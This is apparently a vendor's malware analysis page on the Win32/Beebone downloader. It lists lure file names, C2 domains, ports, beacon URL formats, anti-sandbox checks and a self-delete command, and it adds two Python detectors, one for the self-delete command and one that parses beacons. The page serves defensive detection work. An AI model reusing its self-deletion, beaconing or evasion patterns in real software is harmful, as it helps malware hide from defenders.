Installation
Some variants of this threat get onto your PC through drive-by downloads or social engineering. A variant might also be downloaded and run by other malware, such as a member of the Worm:Win32/Vobfus family.
Other variants might be installed if you click any of the following:
- A malicious link posted on social networking sites
- A malicious link sent through an instant messaging program
- A link with an enticing file name that might have been shared on a public file sharing network
We have seen variants use the following file names, which suggest they are posing as pirated software, key generators or cracks:
- 360Amigo System Speedup 1.2.1.5800 Pro Portable.exe
- 4 Elements II - Collector's Edition - Full PreCracked.exe
- 4U Download YouTube Video 4.2.8.exe
- 7 Wonders IV Magical Mystery Tour (Final).exe
- A Selection of Courses for SolidWorks SolidProfessor Completed DVD 2011-CWZ.exe
- Abvent Artlantis Studio v3.0.6-BEAN.exe
- Ace Combat Assault Horizon KEYGEN CRACK for PC - MAC - PS.exe
- Acrobat X Pro 10 (Portable).exe
- Adobe Acrobat Pro X 10.0.1.434.exe
Payload
Downloads other malware
This threat contacts remote hosts to download other malware. We have seen this threat download the following:
For more information about how it downloads this malware, see the Additional information section below.
After it downloads other malware, it stops running and deletes its own file by running the following command (tasklist serves only as a delay, so that the malware process has exited and its file is no longer locked by the time del runs):
"cmd.exe /c tasklist&&del {Malware Path}"
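The self-deletion command above is a useful process-creation indicator. The following Python is an added example, not part of the original analysis: it runs a detector over a few constructed process-creation records (shaped like the fields a Sysmon Event ID 1 or Security 4688 event provides once command-line auditing is enabled) and separates a true self-delete, where the deleted path is the parent process's own image, from a delayed delete of some other file. The ping-based stall it also matches is a common alternative to tasklist that this page does not mention; the sample records and paths are constructed for the example.

```python
import re

# Constructed process-creation records (not from the original analysis). The
# three fields are what a Sysmon Event ID 1 or Security 4688 event gives you
# once normalised: the parent image, the created image and its command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\1hhy.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c tasklist&&del C:\Users\user\1hhy.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c tasklist /v"},
    {"parent": r"C:\Users\user\AppData\Local\Temp\setup.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c ping 127.0.0.1 -n 3 && del "C:\Users\user\AppData\Local\Temp\payload.tmp"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c del C:\Temp\oldlog.txt"},
]

# "<stall command> && del <path>": the first command exists only to give the
# calling process time to exit so that del can remove its (then unlocked) image.
# tasklist is what this page documents; "ping -n" is the other common stall and
# is included here as an assumption, not from the page.
DELAYED_DELETE = re.compile(
    r"""cmd(?:\.exe)?\s+/c\s+
        (?P<stall>tasklist|ping\b[^&]*?)   # stall command
        \s*&&\s*
        del\s+(?P<target>"[^"]+"|\S+)      # file being deleted
    """,
    re.IGNORECASE | re.VERBOSE,
)


def classify(event):
    """Return (verdict, deleted_path); verdict is 'self_delete', 'delayed_delete' or None."""
    match = DELAYED_DELETE.search(event["cmdline"])
    if not match:
        return None, None
    target = match.group("target").strip('"')
    # The strongest signal: the file being removed is the parent's own image.
    if target.lower() == event["parent"].lower():
        return "self_delete", target
    return "delayed_delete", target


def scan(events):
    """Return [(verdict, parent_image, deleted_path)] for every record that matches."""
    hits = []
    for event in events:
        verdict, target = classify(event)
        if verdict:
            hits.append((verdict, event["parent"], target))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The match on "tasklist" alone is deliberately not enough: a plain "tasklist /v" is ordinary administration, and the record only becomes interesting when it is chained with del, and most of all when the deleted path is the parent image.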
Contacts remote hosts
In the wild, we have seen that Win32/Beebone tries to connect to the following hosts:
- 3d-game.com
- 65512.eu
- adultdns.net
- bbsindex.com
- brenz.pl
- checktech.eu
- checkusb.eu
- chkdtdns.net
- cpuchecks.com
- ddns01.com
- ddns01.eu
- ddns1.eu
- ddnsd.at
- ddnsd.eu
- ddnsx.eu
- dnsd.me
- dtdns.net
- etowns.net
- fe100.net
- grsyl.com
- kdns01.kz
- no-ip1.com
- noip.at
- noip01.org
- noip02.com
- noip1.at
- noip1.com
- noip1.de
- noip1.info
- noip1.nl
- noip1.org
- noip2.at
- noip2.com
- noip2.net
- noip2.nl
- noips.me
- noipx.net
- noipz.com
- noipz.net
- noipz.org
- phone423checker.tk
- s3h.net
- selfip.me
- slyip.com
- somee.com
- ssh01.com
- suroot.com
- time2check.info
- ttl60.org
- vigg.net
- voip01.com
- wiggy.me
- wow64.net
- zdns.eu
- zigg.me
- zma.me
Many of these hosts use domain names that resemble those of dynamic DNS service providers. Because the host name's first label is random (see the request examples in the Additional information section), match on the registered domain and port rather than on the full host name.
These threats use the following ports to access the remote servers:
- 443
- 8080
- 23345
- 27000
- 30980
- 34511
- 40009
- 41001
- 43401
- 46361
- 58897
- 60077
- 60088
- 60099
- 60777
The malware family might access those domains and remote servers to:
- Download and run files (including updates or other malware).
- Report a new infection to its author.
- Receive configuration or other data.
- Receive instructions from a malicious hacker.
- Upload information taken from your PC.
Although some of these servers are located in eastern Europe, the threat generally targets users in the US, South America and Asia. Peru, Mexico and the US have the largest infection numbers, while infections in Europe are comparatively low.
For more information about how it contacts these remote hosts, see the Additional information section below.
This malware family might also have the following executable icon:
Additional information
Older variants of this malware family show the following behavior when they run:

Malware behavior: Makes an HTTP request, usually in the following format:
{random}.{domain}:{port}/{letter}/
Examples:
- 001updates.zma.me:23345/b/
- updates9845.fe100.net:60077/i/
- updateminute.dnsd.me:8080/b/
- windows-update.zigg.me:41001/a/
- winupdateserver1.s3h.net:30980/a/

Malware behavior: The server replies to the HTTP request with a comma-separated list of locations, relative to the request path, from which Beebone downloads malicious files to your computer.
Example: The malware sends an HTTP request to the following URI:
- windows-update.zigg.me:41001/a/
The server then replies with a comma-separated list that looks like this:
76876332/1,76876332/2,76876332/bb1,76876332/z
The download file locations are therefore:
- windows-update.zigg.me:41001/a/76876332/1
- windows-update.zigg.me:41001/a/76876332/2
- windows-update.zigg.me:41001/a/76876332/bb1
- windows-update.zigg.me:41001/a/76876332/z
Recent variants of this threat family show the following behavior when they run:

Malware behavior: Makes an HTTP request in the following format:
{random}.{domain}:{port}/{number}/?{affiliate_id}|{hdserial}{username}
Examples:
- 37462.ddnsx.eu:443/1/?b|-2020396961winxp
- 37480.noip1.at:443/2/?f|-1396129654Guest
- 46546.dtdns.net:443/9/?a|-1312965453MyPC
- 62951.noipx.net:8080/0/?f|-2713912961Developer
- 86788.noip1.com:8080/0/?b|-5711296542Windows7
- 88793.ddns1.eu:443/1/?a|-1296545361Administrator
- 99088.noip2.net:8080/0/?f|-1813912965Admin

Malware behavior: Other variants make the HTTP request to an IP address rather than a host name, using the following format:
http://{ip address}:{port}/{random numbers}/?{first letter of malware’s filename}|{hd_serial}{username}
Examples:
- hxxp://146.255.195.124:60002/8567645/?m|-1234567890Administrator
- hxxp://91.237.247.11:37766/771232/?j|-2345678901GuestUser01

Malware behavior: Uses a specific HTTP User-Agent string when requesting data from the malware server.
Example: It uses the following User-Agent string:
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
On its own this string is a weak indicator, because it is also the genuine User-Agent of Internet Explorer 7 on Windows XP; combine it with the host, port and request path patterns above.

Malware behavior: The server replies to the HTTP request with encrypted data. Once decrypted, the data is a comma-separated list of URLs of the files to be downloaded to your computer.
Example: The decrypted data might look like the following:
899056.noip2.nl:443/v/?75,hxxp://799056.noip2.nl:443/1/?n1,hxxp://799056.noip2.nl:443/1/?s1

Malware behavior: The downloaded files are also encrypted; the malware decrypts them before saving them to your computer.
Examples: File names of the downloaded files can have the following format:
- {number}{random}.exe, or
- z{random}.exe, or
- start1.exe, or
- runme.exe

Malware behavior: Runs the saved files, most often from the %USERPROFILE% folder.
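To make the two request formats and the reply handling concrete, the following Python is an added example, not part of the original analysis or of the malware's own code. It parses both the older {random}.{domain}:{port}/{letter}/ beacon and the newer ?{letter}|{hdserial}{username} form, including the IP-address variant, checks the registered domain and port against a subset of the host and port lists on this page, and expands a server reply into download locations the way the examples above show: relative entries for older variants, complete locations for recent ones. KNOWN_DOMAINS and KNOWN_PORTS hold only a subset of the page's lists for brevity, and taking the registered domain as the last two labels is an assumption that happens to hold for every domain on this page.

```python
import ipaddress
import re

# Subset of the C2 domains and ports listed on this page (feed from the full lists).
KNOWN_DOMAINS = {
    "zma.me", "fe100.net", "dnsd.me", "zigg.me", "s3h.net", "ddnsx.eu",
    "noip1.at", "dtdns.net", "noipx.net", "noip1.com", "ddns1.eu",
    "noip2.net", "noip2.nl",
}
KNOWN_PORTS = {443, 8080, 23345, 27000, 30980, 34511, 40009, 41001, 43401,
               46361, 58897, 60077, 60088, 60099, 60777}

SCHEME = r"^(?:(?:hxxp|http)://)?"          # analysts often defang http as hxxp
HOSTPORT = r"(?P<host>[\w.-]+):(?P<port>\d+)/"

# Older variants: {random}.{domain}:{port}/{letter}/
OLD_BEACON = re.compile(SCHEME + HOSTPORT + r"(?P<path>[a-z])/$", re.I)

# Recent variants: {random}.{domain}:{port}/{number}/?{letter}|{hdserial}{username}
# The page describes {letter} both as an affiliate ID and as the first letter of
# the malware's file name. A username that itself starts with digits would be
# absorbed into the serial here; none of the page's examples does.
NEW_BEACON = re.compile(
    SCHEME + HOSTPORT
    + r"(?P<path>\d+)/\?(?P<letter>[a-z])\|(?P<serial>-?\d+)(?P<user>.*)$",
    re.I,
)

# An entry of a server reply that already carries host:port/ is a full location.
ABSOLUTE = re.compile(SCHEME + HOSTPORT, re.I)


def registered_domain(host):
    """IP literal as-is; otherwise the last two labels (assumption: fits this page's domains)."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        return ".".join(host.lower().split(".")[-2:])


def parse_beacon(url):
    """Parse a Beebone beacon URL into its fields; None if it matches neither format."""
    for kind, pattern in (("old", OLD_BEACON), ("new", NEW_BEACON)):
        m = pattern.match(url.strip())
        if m:
            fields = m.groupdict()
            port = int(fields.pop("port"))
            domain = registered_domain(fields["host"])
            fields.update(
                kind=kind,
                port=port,
                domain=domain,
                base=f"{fields['host']}:{port}/{fields['path']}/",
                known_domain=domain in KNOWN_DOMAINS,
                known_port=port in KNOWN_PORTS,
            )
            return fields
    return None


def expand_reply(beacon, reply):
    """Turn the comma-separated server reply into the list of download locations.

    Older variants return paths relative to the beacon path; recent variants
    (after decryption) return complete host:port/... locations, kept as they are.
    """
    urls = []
    for entry in reply.split(","):
        entry = entry.strip()
        if not entry:
            continue
        urls.append(entry if ABSOLUTE.match(entry) else beacon["base"] + entry)
    return urls


if __name__ == "__main__":
    b = parse_beacon("windows-update.zigg.me:41001/a/")
    print(b["kind"], b["domain"], b["known_domain"], b["known_port"])
    for u in expand_reply(b, "76876332/1,76876332/2,76876332/bb1,76876332/z"):
        print(" ", u)
```

Running the beacon through parse_beacon on proxy or DNS log lines gives you the registered domain and port to alert on; the random first label and the per-victim serial and username are exactly the parts you should not key a signature on.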
Malware behavior: Checks whether any of the following modules is loaded in memory. If one of them is present, Beebone does not run its malicious routine. The modules indicate that:
- the malware is being debugged (dbghelp.dll)
- the malware is running in a sandbox (sbiedll.dll, the Sandboxie DLL)
- avast! antivirus is running on the system (snxhk.dll)
Examples:
- dbghelp.dll
- sbiedll.dll
- snxhk.dll

Malware behavior: Checks whether your computer is running in a virtual machine by looking for certain strings in the registry value "HKLM\System\ControlSet001\Services\Disk\Enum\0", which holds the device instance ID of the first disk and so contains the disk's vendor and model name. If it finds any of those strings, the trojan does not run.

Malware behavior: Uses anti-debugging techniques.
Example: The module check above; in particular, if snxhk.dll is loaded, the malware concludes that avast! antivirus is installed and does not run its malicious routine.
In the wild, we have seen these threats use the following file names:
- 0wxm.exe
- 1hhy.exe
- 2gy.exe
- 4meu.exe
- 5rry.exe
- zyyp.exe
Newer variants name the downloaded files using the format {random numbers}.exe.
Example:
These files might be detected as variants of the following families:
Related reading
Analysis by Allan Sepillo